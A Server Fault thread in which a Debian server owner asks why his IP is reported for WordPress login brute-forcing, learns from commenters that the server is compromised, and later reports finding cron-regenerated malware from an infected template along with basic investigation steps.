0

I have a server that has been reported as an attacker since January, finally today I found some information about these attacks, however none of the logs on my server shows anything similar. As a consequence the IP is being banned in many blacklists and is causing big problem to my postfix users.

As can be seen in the attack logs, these are carried out through a browser and Windows NT, however my server is a Debian 9, here some examples, 62.X.X.X is my IP (sensitive information removed)

62.X.X.X - - [01/Mar/2021:14:25:28 +0000] 80 "GET /wp-login.php HTTP/1.1" 403 794 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"

xmlrpc attack

WP-xmlrpc exploit

Mar 1 06:52:53 h2880623 wordpress(www.zzzzz.zz)[6547]: XML-RPC authentication attempt for unknown user [login] from 62.X.X.X

uvcm 62.X.X.X [27/Feb/2021:19:47:01 "-" "POST /wp-login.php 200 1946
62.X.X.X [28/Feb/2021:12:01:03 "-" "GET /wp-login.php 200 5753
62.X.X.X [28/Feb/2021:12:01:05 "-" "POST /wp-login.php 200 5872

62.X.X.X - - [27/Feb/2021:19:09:53 +0100] "POST /wp-login.php HTTP/1.1" 200 2661 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
62.X.X.X - - [27/Feb/2021:19:09:54 +0100] "POST /wp-login.php HTTP/1.1" 200 2637 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"
62.X.X.X - - [27/Feb/2021:19:10:00 +0100] "POST /wp-login.php HTTP/1.1" 200 2636 "-" "Mozilla/5.0(Windows NT 6.3; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0"

etc.. etc..

Can someone spoof my ip to perform those attacks? Can I do something to mitigate it?

Edit: I already read long time ago this post How do I deal with a compromised server?, and followed it carefully, but even after following those recommendations my server got compromised or there is something else out of my scope going on.

spacebiker
  • 358
  • 4
  • 14
  • 3
    HTTP/1.1 is transmitted via TCP, meaning nobody can feasibly use that IP at the same time as you do. Someone is using your server for malicious purposes. And no, the fact the attacker filled that arbitrary informational field with a line resembling firefox on windows does not mean anything at all. – anx Mar 04 '21 at 12:47
  • 3
    Does this answer your question? [How do I deal with a compromised server?](https://serverfault.com/questions/218005/how-do-i-deal-with-a-compromised-server) – anx Mar 04 '21 at 12:47
  • 1
    About the other question: [Can the IP address for an HTTP request be spoofed?](https://serverfault.com/questions/381393/can-the-ip-address-for-an-http-request-be-spoofed) – anx Mar 04 '21 at 12:49
  • Hi @anx, thanks for your replies. I knew about the first post and I already followed those advices long time ago, that's why I am astonish because I work everyday on the server to keep it secure and I cannot find anything relevant in any log, so if there is somebody in, he is very good on his task. – spacebiker Mar 04 '21 at 16:18
  • To be honest, I suspect that there is nobody in, but there is some bad guy from the competitors who wants to knock me out by creating bad reputation on my IP. I am not so vain to think that I am the best IT guy in the world and that nobody can penetrate my system, but from what I have been able to investigate so far it leads me to think like this. In fact, the attack logs I got from abuseipdb.com, which is a system where anybody can report what they want .. in the end, the truth is that i am being blacklisted every day in the last 4 days – spacebiker Mar 04 '21 at 16:27
  • And last but not least, TCP spoofing is not impossible. This has been known for many years: https://www.jakoblell.com/blog/2013/08/13/quick-blind-tcp-connection-spoofing-with-syn-cookies/ – spacebiker Mar 04 '21 at 17:02
  • It is extraordinarily improbable for a _single_ blind TCP spoofing attack to succeed, let alone dozens or hundreds of them against many other hosts. Your server is still compromised. That is what you need to deal with. – Michael Hampton Mar 04 '21 at 17:32
  • @anx, I am not accusing anybody, I have an account since long time ago and they didn't ask me for much information to register and to send attacks. I have always sent true information, but it is very easy to send fake reports. You can create an account and you will see how easy it would be to send fake attacks. My server might be compromised, I do not know yet but I think what i say makes sense, at least for me. Thank you anyway for your replies and useful information ;) – spacebiker Mar 04 '21 at 21:21

1 Answers1

0

I finally managed to fix the problem. After much analysis I found the damn malware that was running on the server, all due to an infected template installed by third party. Somehow, the malware managed to create a cron job to regenerate itself, maldet was deleting the offending php code but due to that cron the malware was regenerated.

So the answer to my first question as @anx and @Michael pointed is absolutely "NO", someone did not spoof my IP to perform those attacks. And the answer to Can I do something to mitigate it? is Investigate:

  1. check for open connections:

    lsof -Pnl +M -i4
    
  2. check logs (syslog, auth.log, apache (nginx), etc..)

you can follow the recommendations i wrote in this answer: https://superuser.com/a/792971/123200

spacebiker
  • 358
  • 4
  • 14